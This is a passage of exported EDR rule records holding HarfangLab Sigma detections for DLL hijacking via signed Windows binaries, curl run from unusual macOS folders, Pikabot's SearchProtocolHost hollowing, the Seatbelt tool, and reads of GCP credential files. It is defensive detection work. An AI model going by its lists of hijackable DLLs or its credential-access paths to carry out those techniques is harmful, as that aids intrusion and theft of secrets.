behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dmcfghost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DMCmnUtils.dll'\n - '\\DMPushProxy.dll'\n - '\\dmxmlhelputils.dll'\n - '\\dsclient.dll'\n - '\\iri.dll'\n - '\\omadmapi.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2da5035b-dc02-4700-8b81-859d0243e461", "rule_name": "DLL Hijacking via dmcfghost.exe", "rule_description": "Detects potential Windows DLL Hijacking via dmcfghost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2dd18b86-68a7-4c00-9cd0-36f3ad10d60e", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.617713Z", "creation_date": "2026-03-23T11:45:34.617715Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.617719Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/", "https://attack.mitre.org/techniques/T1105/" ], "name": "t1105_curl_susp_parent.yml", "content": "title: Curl Executed in a Suspicious Execution Context\nid: 2dd18b86-68a7-4c00-9cd0-36f3ad10d60e\ndescription: |\n Detects the curl command being executed by a parent process located in an uncommon folder.\n Attackers may execute curl to download additional payloads.\n It is recommended to investigate files that were downloaded, and to analyze the process that executed the curl command to determine whether this action was legitimate.\nreferences:\n - https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2024/07/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.CommandAndControl\n - classification.macOS.Behavior.FileDownload\n - classification.macOS.Behavior.Exfiltration\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/curl'\n\n selection_susp_ancestors:\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n filter_shell:\n ParentImage|endswith:\n - '/zsh'\n - '/sh'\n - '/bash'\n\n exclusion_adode:\n ProcessParentImage|endswith: '/AcroInstallAlert.app/Contents/MacOS/AcroInstallAlert'\n ProcessCommandLine|startswith: '/usr/bin/curl -H Cache-Control: no-cache https://acroipm2.adobe.com/'\n\n condition: selection and 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2dd18b86-68a7-4c00-9cd0-36f3ad10d60e", "rule_name": "Curl Executed in a Suspicious Execution Context", "rule_description": "Detects the curl command being executed by a parent process located in an uncommon folder.\nAttackers may execute curl to download additional payloads.\nIt is recommended to investigate files that were downloaded, and to analyze the process that executed the curl command to determine whether this action was legitimate.\n", "rule_creation_date": "2024-07-22", "rule_modified_date": "2025-04-11", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control" ], "rule_technique_tags": [ "attack.t1105" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2de657e9-b90e-455c-921d-6dc97f347601", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.618947Z", "creation_date": "2026-03-23T11:45:34.618949Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.618953Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_slui.yml", "content": "title: DLL Hijacking via slui.exe\nid: 2de657e9-b90e-455c-921d-6dc97f347601\ndescription: |\n Detects potential Windows DLL Hijacking via slui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'slui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\iphlpapi.dll'\n - '\\ndfapi.dll'\n - '\\PROPSYS.dll'\n - '\\sppc.dll'\n - '\\wdi.dll'\n - '\\WINBRAND.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n filter_docker:\n Image: '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\slui.exe'\n ImageLoaded: '*\\windowsfilter\\\\*\\Files\\Windows\\System32\\\\*.dll'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2de657e9-b90e-455c-921d-6dc97f347601", "rule_name": "DLL Hijacking via slui.exe", "rule_description": "Detects potential Windows DLL Hijacking via slui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2e0c666b-c55c-45ac-b889-dd35b1dd206c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.080686Z", "creation_date": "2026-03-23T11:45:34.080688Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.080692Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_mshta.yml", "content": "title: DLL Hijacking via mshta.exe\nid: 2e0c666b-c55c-45ac-b889-dd35b1dd206c\ndescription: |\n Detects potential Windows DLL Hijacking via mshta.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mshta.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\netutils.dll'\n - '\\srpapi.dll'\n - '\\SspiCli.dll'\n - '\\WINHTTP.dll'\n - '\\wkscli.dll'\n - '\\WLDP.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2e0c666b-c55c-45ac-b889-dd35b1dd206c", "rule_name": "DLL Hijacking via mshta.exe", "rule_description": "Detects potential Windows DLL Hijacking via mshta.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2e473606-203c-47b8-8899-647af707c98a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.080012Z", "creation_date": "2026-03-23T11:45:34.080014Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.080018Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot", "https://www.zscaler.fr/blogs/security-research/technical-analysis-pikabot", "https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html", "https://attack.mitre.org/techniques/T1055/" ], "name": "t1055_suspicious_searchprotocolhost_execution.yml", "content": "title: Suspicious SearchProtocolHost.exe Execution\nid: 2e473606-203c-47b8-8899-647af707c98a\ndescription: |\n Detects the suspicious execution of the legitimate SearchProtocolHost.exe Windows binary without legitimate command-line arguments.\n This technique has been used by the Pikabot malware, which starts SearchProtocolHost as a host for its payload, injected via process hollowing.\n Attackers can use process hollowing to inject malicious code into legitimate processes, allowing them to evade detection and execute harmful activities on a compromised system.\n It is recommended to analyze actions taken by SearchProtocolHost as well as to look for other suspicious actions performed by the parent process.\nreferences:\n - https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot\n - https://www.zscaler.fr/blogs/security-research/technical-analysis-pikabot\n - https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/11/20\nmodified: 2025/09/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'SearchProtocolHost.exe'\n ProcessParentImage|contains: '?'\n\n filter_commandline:\n CommandLine|contains: ' Global\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2e473606-203c-47b8-8899-647af707c98a", "rule_name": "Suspicious SearchProtocolHost.exe Execution", "rule_description": "Detects the suspicious execution of the legitimate SearchProtocolHost.exe Windows binary without legitimate command-line arguments.\nThis technique has been used by the Pikabot malware, which starts SearchProtocolHost as a host for its payload, injected via process hollowing.\nAttackers can use process hollowing to inject malicious code into legitimate processes, allowing them to evade detection and execute harmful activities on a compromised system.\nIt is recommended to analyze actions taken by SearchProtocolHost as well as to look for other suspicious actions performed by the parent process.\n", "rule_creation_date": "2023-11-20", "rule_modified_date": "2025-09-23", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1055" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2e58af7c-54b9-470d-b64b-f3731c941837", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.594471Z", "creation_date": "2026-03-23T11:45:34.594474Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.594482Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_systemreset.yml", "content": "title: DLL Hijacking via systemreset.exe\nid: 2e58af7c-54b9-470d-b64b-f3731c941837\ndescription: |\n Detects potential Windows DLL Hijacking via systemreset.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systemreset.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\Cabinet.dll'\n - '\\d3d10warp.dll'\n - '\\d3d11.dll'\n - '\\dbgcore.DLL'\n - '\\DismApi.DLL'\n - '\\dxgi.dll'\n - '\\FVEAPI.dll'\n - '\\ReAgent.dll'\n - '\\ResetEngine.dll'\n - '\\tbs.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\WDSCORE.dll'\n - '\\WIMGAPI.DLL'\n - '\\WINHTTP.dll'\n - '\\WOFUTIL.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2e58af7c-54b9-470d-b64b-f3731c941837", "rule_name": "DLL Hijacking via systemreset.exe", "rule_description": "Detects potential Windows DLL Hijacking via systemreset.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2e6c9be7-7b83-4cf8-8c6f-ffbf9b4ce480", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.588697Z", "creation_date": "2026-03-23T11:45:34.588700Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.588708Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/xforcered/WFH", "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_wwahost.yml", "content": "title: DLL Hijacking via WWAHost.exe\nid: 2e6c9be7-7b83-4cf8-8c6f-ffbf9b4ce480\ndescription: |\n Detects potential Windows DLL Hijacking via WWAHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WWAHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iertutil.dll'\n - '\\profapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2e6c9be7-7b83-4cf8-8c6f-ffbf9b4ce480", "rule_name": "DLL Hijacking via WWAHost.exe", "rule_description": "Detects potential Windows DLL Hijacking via WWAHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2e734ab0-736c-4df7-904a-68429e75bea2", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.606287Z", "creation_date": "2026-03-23T11:45:34.606291Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.606298Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/GhostPack/Seatbelt", "https://attack.mitre.org/techniques/T1082/" ], "name": "t1082_launch_seatbelt.yml", "content": "title: Seatbelt HackTool Executed\nid: 2e734ab0-736c-4df7-904a-68429e75bea2\ndescription: |\n Detects the execution of the Seatbelt host enumeration and security assessment tool.\n Seatbelt is an offensive security tool commonly used by attackers during the discovery phase to gather detailed system information, security configurations, and potential weaknesses that could be exploited for privilege escalation.\n Unless this execution is part of an authorized security audit, it is recommended to investigate the context of this activity including the user account involved and any data gathered by the tool, as it may indicate reconnaissance for an attack.\nreferences:\n - https://github.com/GhostPack/Seatbelt\n - https://attack.mitre.org/techniques/T1082/\ndate: 2021/04/26\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1082\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Seatbelt\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\Seatbelt.exe'\n - OriginalFileName: 'Seatbelt.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2e734ab0-736c-4df7-904a-68429e75bea2", "rule_name": "Seatbelt HackTool Executed", "rule_description": "Detects the execution of the Seatbelt host enumeration and security assessment tool.\nSeatbelt is an offensive security tool commonly used by attackers during the discovery phase to gather detailed system information, security configurations, and potential weaknesses that could be exploited for privilege escalation.\nUnless this execution is part of an authorized security audit, it is recommended to investigate the context of this activity including the user account involved and any data gathered by the tool, as it may indicate reconnaissance for an attack.\n", "rule_creation_date": "2021-04-26", "rule_modified_date": "2025-04-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1082" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2e7c5a05-6c01-4aac-b25c-16ea27b31087", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.098251Z", "creation_date": "2026-03-23T11:45:34.098253Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.098258Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1552/001/" ], "name": "t1552_004_gcp_config_read_macos.yml", "content": "title: Suspicious Access to GCP Database File\nid: 2e7c5a05-6c01-4aac-b25c-16ea27b31087\ndescription: |\n Detects an attempt to read the content of the GCP database.\n Adversaries may access a user's GCP database file in order to gather credentials and move to cloud environments.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - 